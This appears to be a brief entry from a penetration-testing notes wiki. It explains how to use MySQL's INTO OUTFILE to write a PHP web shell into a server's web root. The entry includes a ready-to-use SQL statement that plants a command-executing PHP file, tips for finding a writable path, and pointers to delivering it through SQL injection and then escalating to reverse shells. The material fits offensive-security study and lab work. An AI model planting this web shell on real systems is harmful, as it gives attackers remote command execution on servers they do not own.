# MySQL You can "upload" reverse shells using MySQL using `INTO OUTFILE`: ```sql SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php'; ``` The path may require some brute-forcing or additional reconnaissance; sometimes you can force an error to return a (potentially) writeable path. Depending on how the application you're attacking is configured, it may be possible to exploit this via [[SQL injection attacks|SQLi]]. This can be used to bootstrap reverse shells.